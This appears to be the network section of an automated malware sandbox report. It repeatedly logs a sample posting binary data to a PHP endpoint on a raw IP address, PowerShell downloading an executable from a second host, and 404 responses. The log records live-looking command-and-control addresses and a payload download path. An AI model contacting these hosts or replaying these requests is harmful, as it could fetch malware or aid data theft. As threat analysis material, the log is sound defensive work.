            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04BB4B90 URLDownloadToFileW,1_2_04BB4B90
            Source: global trafficHTTP traffic detected: GET /33/caspol.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 66.63.187.231Connection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
            Source: unknownHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 176Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
